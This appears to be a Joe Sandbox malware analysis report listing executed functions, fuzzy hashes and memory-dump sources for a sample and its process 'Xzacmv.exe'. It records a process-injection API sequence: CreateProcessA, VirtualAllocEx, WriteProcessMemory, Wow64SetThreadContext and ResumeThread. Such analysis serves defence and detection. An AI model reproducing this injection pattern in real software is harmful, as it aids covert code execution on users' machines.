Opcode Fuzzy Hash: f0c97e1bffa1d1e8dc0f3acd892877b51db81aa90dcb42e7526958b6e737452a
Instruction Fuzzy Hash: 60E1F73592075A9FCB01EBA8D8646D9B771FF95200F10C79AD00A7B261EF706AC5CB91

Function 018FD424 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1427787431.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53899795b7675b0c0a121cc5dd5e0e05aaf34845c43e2bbc0b55f1b3132b962c
Instruction ID: cf6d657747205bd8ba743cd4993298b33334104baaed562d44c548b556a2d005
Opcode Fuzzy Hash: 53899795b7675b0c0a121cc5dd5e0e05aaf34845c43e2bbc0b55f1b3132b962c
Instruction Fuzzy Hash: B6A16232E1061A8FCF05DFB8C88059EBBB2FF85300B15856EEA05EB265DB71DA55CB40

Function 07620FF8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435957019.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7620000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae75626f0fbea6025a03421a3a89307ade483cbf13e3e08c110d98200ba6ba75
Instruction ID: e7b9c653c19ecbe4d3850c53f6c803776fa24d5e7444f0136960b66a0328971b
Opcode Fuzzy Hash: ae75626f0fbea6025a03421a3a89307ade483cbf13e3e08c110d98200ba6ba75
Instruction Fuzzy Hash: 54D1E635D2075ADBCB01EBA8D96469DB7B1FF95200F10C79AD50A3B220EF706AC5CB91

Function 057A0078 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1433437696.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57a0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a673ce2caddec2fcafe3611a80da20a44adda3493fd3f7de04ac961f50eb405b
Instruction ID: af68c095ee8dbec503e3aa96a68b397ca67dfaa4a90b669522b8de874f31ca08
Opcode Fuzzy Hash: a673ce2caddec2fcafe3611a80da20a44adda3493fd3f7de04ac961f50eb405b
Instruction Fuzzy Hash: 13C1FAB0C227498BE710DF69E84E1897FB1FBA5318F516209E1636B2D0DFB4194ACF58

Function 07DE3E1F Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1436324417.0000000007DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7de0000_oAUBqI6vQ7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8e36ca9d806a450a4c0b9a48c34315b1033c59984bd62f0722b716ffe6895fd
Instruction ID: 7a6db99a01d720f0aefc476800b0a51e6be9f4a68c2ed072a2ccf9dabf1a4f94
Opcode Fuzzy Hash: e8e36ca9d806a450a4c0b9a48c34315b1033c59984bd62f0722b716ffe6895fd
Instruction Fuzzy Hash: BE5107B4E002198FDB15DFA9C5805AEFBF6BF89305F24816AD418AB355DB309D42CFA0

Analysis Process: Xzacmv.exePID: 8160, Parent PID: 1124COMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	232
Total number of Limit Nodes:	16

Executed Functions

Function 0280D4F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0280D576
GetCurrentThread.KERNEL32 ref: 0280D5B3
GetCurrentProcess.KERNEL32 ref: 0280D5F0
GetCurrentThreadId.KERNEL32 ref: 0280D649

Memory Dump Source

Source File: 0000000A.00000002.1475876587.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2800000_Xzacmv.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 82eceae86dc45f837bcad1732ff670de730696addbcf745aab814b36a0cb0c50
Instruction ID: de8bd1d755b93bb29646b9b783e423734f97c10020942bbc4e77dab7c5bc7a0a
Opcode Fuzzy Hash: 82eceae86dc45f837bcad1732ff670de730696addbcf745aab814b36a0cb0c50
Instruction Fuzzy Hash: C95157B4904309CFDB54CFA9D988BAEBBF1FF48304F208459E419A7291D7749944CB65

Function 06FD5354 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FD5596

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8116b12fe1a9fcfe8575d568baca747d93aa5ee2fafe0a94356ab332c2887826
Instruction ID: 74c390fdef226bf82b9d49cc1899bac894113407a8b71526d51a2d9f2f083936
Opcode Fuzzy Hash: 8116b12fe1a9fcfe8575d568baca747d93aa5ee2fafe0a94356ab332c2887826
Instruction Fuzzy Hash: D0A15B71D003198FEF60DFA8C8517EEBBB2BF49314F188569D818A7240DB759985CF91

Function 06FD5360 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06FD5596

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 934d22144b880bb3d3bb806b5e5cde25ade526d05111aced78caaf8f126aedc1
Instruction ID: dd33c11ed170a572891679161684df9dc5ca46ae6ad3df01cdea815506487632
Opcode Fuzzy Hash: 934d22144b880bb3d3bb806b5e5cde25ade526d05111aced78caaf8f126aedc1
Instruction Fuzzy Hash: 5A916B71D003198FEF60DFA8C8507EEBBB2BF49314F188569D818A7280DB75A985CF91

Function 0280AE59 Relevance: 1.7, APIs: 1, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0280B0BE

Memory Dump Source

Source File: 0000000A.00000002.1475876587.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2800000_Xzacmv.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ff7ba72f261e3094aa22ebac441abbd718ac160e9a2422fd94f900d83d06fea6
Instruction ID: e82d3094350c6c05d161a9a5e57dbf1e7e680274116d1981ac2c954a1b018679
Opcode Fuzzy Hash: ff7ba72f261e3094aa22ebac441abbd718ac160e9a2422fd94f900d83d06fea6
Instruction Fuzzy Hash: 2F919DB8A00B458FD768CF69C49479ABBF1FF88304F00892DD18ADBA80D775E855CB91

Function 0280590D Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028059C9

Memory Dump Source

Source File: 0000000A.00000002.1475876587.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2800000_Xzacmv.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: dfeba26923fb40854d0a235de9d91f335e77078c94f80a43b505e8ab240add7d
Instruction ID: bff0108d90725803f373dc7929db06f3f0f111a0bf2e2c16eb37e7813fa89d86
Opcode Fuzzy Hash: dfeba26923fb40854d0a235de9d91f335e77078c94f80a43b505e8ab240add7d
Instruction Fuzzy Hash: 3941D2B4C00719CFEB14CFA9C98478DBBF1BF89304F64806AD459AB291DB756949CF50

Function 028044E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028059C9

Memory Dump Source

Source File: 0000000A.00000002.1475876587.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2800000_Xzacmv.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 503fc703a29b3479e3ce1a22e787b4d15c6c21891938832e518e01fbfc87b67f
Instruction ID: 1f85952e1addda722dc5fce256531d7a433b51b31da24aebc94233308e7d9e79
Opcode Fuzzy Hash: 503fc703a29b3479e3ce1a22e787b4d15c6c21891938832e518e01fbfc87b67f
Instruction Fuzzy Hash: 1F41C274C00718CFDB24DFA9C884B9EBBF5BF89304F648069D419AB291D7755945CF90

Function 06FD4CD0 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FD4D68

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 21f8199fe655fea3bede8774128e40c1806b877f9869ef921a1b1b0d73ef0c32
Instruction ID: 575db236784b0fd359020f992c31e4c74b3644866b285f1aa45f39ecfb28b033
Opcode Fuzzy Hash: 21f8199fe655fea3bede8774128e40c1806b877f9869ef921a1b1b0d73ef0c32
Instruction Fuzzy Hash: 66214875D003099FDB10CFA9C8857EEBBF5FF48310F54842AE959A7241C778A545CBA4

Function 06FD4CD8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FD4D68

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fd3d5b4e14ab3b58d175b655aeb4183c82065dc8c927f600542eba9fe680913a
Instruction ID: 10570c888156063f367795f8ee3bd4e0195ba433b1927087b4f2447442b71409
Opcode Fuzzy Hash: fd3d5b4e14ab3b58d175b655aeb4183c82065dc8c927f600542eba9fe680913a
Instruction Fuzzy Hash: 67212671D003099FDB10CFA9C885BEEBBF5FF48310F54842AE959A7240C779A944CBA4

Function 06FD51C0 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FD5248

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1727128fee44b83598d79125e8799ccf8e2198367e647d6920e62c6279e8181d
Instruction ID: 125ea17bf89c64445ede415d3a0c40acca5b9cd455d8c6d685681467cd16de90
Opcode Fuzzy Hash: 1727128fee44b83598d79125e8799ccf8e2198367e647d6920e62c6279e8181d
Instruction Fuzzy Hash: 4E211971C003499FDB10CF9AC8857EEBBF5FF48314F54842AE958A7250C7759545CBA4

Function 06FD4701 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FD4786

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f68ccad56f718c720448928da9b77aeb247b1bab676848343586e27b58b6759f
Instruction ID: 5b5459dadd78bf376ea63e5a488ed57717e1a8477fd9ce1ebeea478b86f873ae
Opcode Fuzzy Hash: f68ccad56f718c720448928da9b77aeb247b1bab676848343586e27b58b6759f
Instruction Fuzzy Hash: A6217971D003099FDB50DFAAC4857EEBBF5EF49324F548429D859A7281C778A944CFA0

Function 06FD4708 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FD4786

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 99abd9e9d5737a93c8fd7ee61dd964cfcc3a560aea1171da2677ee7fe4eb9e0f
Instruction ID: d33cfccd9dc26526f7c89d4951d73933e42fdb76bb726413e1363e11c456ab8a
Opcode Fuzzy Hash: 99abd9e9d5737a93c8fd7ee61dd964cfcc3a560aea1171da2677ee7fe4eb9e0f
Instruction Fuzzy Hash: C1217771D003099FDB50CFAAC4857EEBBF5EF49314F14842AD858A7240CB78A944CFA0

Function 06FD51C8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FD5248

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f172cd99e9a3c342b0416fe6e5da1affb72bfbb2c5398467f9901bb0b9c088d6
Instruction ID: c6540ef4a4d5e35f17e255b64fcc5ed24e250ffa2bb04ccebfa1a173d4d95f9d
Opcode Fuzzy Hash: f172cd99e9a3c342b0416fe6e5da1affb72bfbb2c5398467f9901bb0b9c088d6
Instruction Fuzzy Hash: 882128B1C003499FDB10CFAAC845BEEBBF5FF48314F548429E958A7240C7799545CBA4

Function 0280D740 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0280D7C7

Memory Dump Source

Source File: 0000000A.00000002.1475876587.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2800000_Xzacmv.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4bde9d85a068869e30a0e3a78e835fdc8804e413251b5ecb37409116b458dec1
Instruction ID: 784843ff477b704876153b6131c4cc54d1794d028bf3804d4470b05ae9bf9427
Opcode Fuzzy Hash: 4bde9d85a068869e30a0e3a78e835fdc8804e413251b5ecb37409116b458dec1
Instruction Fuzzy Hash: 7121E4B59002089FDB10CF9AD984ADEBBF4EB48310F14842AE958A7350C374A944CF60

Function 06FD4C10 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FD4C86

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c941763b39b2d18af50a78333655df1072462d844ca91b293a11b4d0d431127
Instruction ID: 8efd3f6b6dc2982b22856f5bdaa3b231f2330463b3a08001b3eb592984fbb9ff
Opcode Fuzzy Hash: 3c941763b39b2d18af50a78333655df1072462d844ca91b293a11b4d0d431127
Instruction Fuzzy Hash: 021153718003489FDF10CFAAC804BEEBBF5EF48320F188429E959A7250C776A954CBA0

Function 06FD4C18 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FD4C86

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 674b0e29ec65ba8bea3b3783b19597fcc1fafb9b095b3fa47ca1a768dea04b27
Instruction ID: 457fc9c62a900aa89b463b5b042938d2029a2987b0c6e1e993be8c57af7d8e89
Opcode Fuzzy Hash: 674b0e29ec65ba8bea3b3783b19597fcc1fafb9b095b3fa47ca1a768dea04b27
Instruction Fuzzy Hash: 131134728003499FDF10DFAAC845BEEBBF5EF48324F148429E959A7250C776A944CFA0

Function 06FD4658 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06FD46BA

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0619ff942b700e7c5ec87a8277cc2c5a6c90fb807bc0f3a567897b4a9f75f839
Instruction ID: 43da75b63cd73f1f64b42ca90e1c411ff501abfdcea2690aa2887226853a4d84
Opcode Fuzzy Hash: 0619ff942b700e7c5ec87a8277cc2c5a6c90fb807bc0f3a567897b4a9f75f839
Instruction Fuzzy Hash: 421136B1D003488FDB10DFAAC8457EEFBF5EF89224F248429D559A7240CB79A944CFA4

Function 06FD4656 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06FD46BA

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 31fef3a965f4d12f0168184c362c89a3d4a45100592565af93824fc777bc18db
Instruction ID: d08398bc52509d5ce6c4b6b7121d307c1858a436ef486a60b340c95ab1dfe000
Opcode Fuzzy Hash: 31fef3a965f4d12f0168184c362c89a3d4a45100592565af93824fc777bc18db
Instruction Fuzzy Hash: F61136B1D003088FDB10DFAAC8497EEFBF5AF48214F28842AC559B7640C779A544CF94

Function 0280B058 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0280B0BE

Memory Dump Source

Source File: 0000000A.00000002.1475876587.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2800000_Xzacmv.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6cb254b6007694bb43729275da1af24b8076b31ea50e6f260915e8d33552686f
Instruction ID: a7f63e3e8439fba1f0041f038e660cbe0818a67f805459bdeaca2ac37f12b4ea
Opcode Fuzzy Hash: 6cb254b6007694bb43729275da1af24b8076b31ea50e6f260915e8d33552686f
Instruction Fuzzy Hash: B711DFB9C006498FDB10CF9AC844BDEFBF4AF88218F14842AD969A7650D379A545CFA1

Function 06FD8F40 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06FD8FA5

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 35537944dfeddb4184671ad51f8645c6fcd2f49b1b83c4b294efa8377e0f9b14
Instruction ID: b194f37d66151c4bc8fbc516bb7a2737c027f7c4e254c574e2f441d8d0782c59
Opcode Fuzzy Hash: 35537944dfeddb4184671ad51f8645c6fcd2f49b1b83c4b294efa8377e0f9b14
Instruction Fuzzy Hash: 0E11D3B58047499FDB50CF9AC889BDEFBF8EB48324F14841AE958A7240C375A544CFA5

Function 06FD4F34 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06FD8FA5

Memory Dump Source

Source File: 0000000A.00000002.1482518763.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6fd0000_Xzacmv.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3cb4284a189dc26c822b461e5d0932c9b1b567741c0d8285bdee2684d00fcf17
Instruction ID: 36f3e0eca865235d96538a84ca620d38708f3cf128cb61e0d6bb265190aeed18
Opcode Fuzzy Hash: 3cb4284a189dc26c822b461e5d0932c9b1b567741c0d8285bdee2684d00fcf17
Instruction Fuzzy Hash: 2C1103B5804749DFDB50CF9AC848BDEFBF9EB48324F14841AE958A7240C375A944CFA1

Function 00EBD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475400243.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ebd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b46e5b551622e38d7cee7f745575630a78ff47eeec3f6771657c731ba045a8
Instruction ID: eb26fd5ef1f6b6d81b05cfee5e4675290d92c9a70dfab311825fb5c956555308
Opcode Fuzzy Hash: 15b46e5b551622e38d7cee7f745575630a78ff47eeec3f6771657c731ba045a8
Instruction Fuzzy Hash: 7A212571508240DFDB25DF10DDC0BA7BF65FB88318F20C569E8091B256D336D856CBA2

Function 00EBD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475400243.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ebd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c12e9b5317b1d84e98a94c1ee72a2dbc38f761a0c3cd51d45b7f701e5a11f98
Instruction ID: f103a1e57912ddfd883deb1a2abd25f5b30d81a0146f9a7b48f8435b2f79274a
Opcode Fuzzy Hash: 2c12e9b5317b1d84e98a94c1ee72a2dbc38f761a0c3cd51d45b7f701e5a11f98
Instruction Fuzzy Hash: E22145B1508304DFDB04DF00DDC0BA7BB65FB98328F20C568E8095B256D336E856CBA2

Function 00ECD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475469585.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ecd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4bfef6a49bb96cdfd91554cda626e4411317063ed7561bfb15dcd50b281d7b
Instruction ID: 469d0a26d3226d0d184473d39a4200b760d0cce8d38ec1b7786abb7082f295a1
Opcode Fuzzy Hash: ba4bfef6a49bb96cdfd91554cda626e4411317063ed7561bfb15dcd50b281d7b
Instruction Fuzzy Hash: 8721D071608300DFDB14DF18DA85F26BBA6EB88318F20C57DD84A5B296C337D857CA62

Function 00ECD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475469585.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ecd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072bf42d5439fd1de38b91682a816af177f604c75f9aa40061ee0b8d458d570b
Instruction ID: d576efe8f8affee84fa4e6a3671796f2d9272b977c8e37b5890db0d9520584ff
Opcode Fuzzy Hash: 072bf42d5439fd1de38b91682a816af177f604c75f9aa40061ee0b8d458d570b
Instruction Fuzzy Hash: FB21BDB1508204AFDB09DF50DA80F26BBA5EB88318F24C57DE8495A2A2C237D856CA61

Function 00ECD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475469585.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ecd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56544b6491d84402ebf40d26fa51b11a6e28af1a130642d062a5ddc3439dce7a
Instruction ID: 88a68055f278798ca430e315e4691100e36ae4fc7bd9d70290e0dfa8e0d1f1fd
Opcode Fuzzy Hash: 56544b6491d84402ebf40d26fa51b11a6e28af1a130642d062a5ddc3439dce7a
Instruction Fuzzy Hash: 1A2160755093808FD702CF24D994B15BF71AB46214F28C5EAD8498B6A7C33B980ACB62

Function 00EBD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475400243.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ebd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction ID: 56f781c17156b19fc6db8a457d0d417c468c06df209caa2085d2574b2342b4c4
Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction Fuzzy Hash: 1611E676508280CFCB16CF10D9C4B56BF71FB94328F24C6A9D8494B656C33AD85ACBA1

Function 00EBD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475400243.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ebd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction ID: 13a2ae7665396b56d44aab84c1089442cf2bec5ef8cb78a277842e1aaf748c70
Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
Instruction Fuzzy Hash: 5D112672408240CFCB12CF00D9C4B56BF71FB94328F24C6A9D8090B657C33AE85ACBA2

Function 00ECD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475469585.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ecd000_Xzacmv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
Instruction ID: 718000a4a500fee78c6741fcc91ddeade32008660cf7bad90436dfb27b8304af
Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
Instruction Fuzzy Hash: 42118B76508280DFCB15CF50DAC4B15BBA1FB84318F24C6AED8494B6A6C33BD85ACB61

Function 00EBD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1475400243.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ebd000_Xzacmv.jbxd

Similarity

API ID:
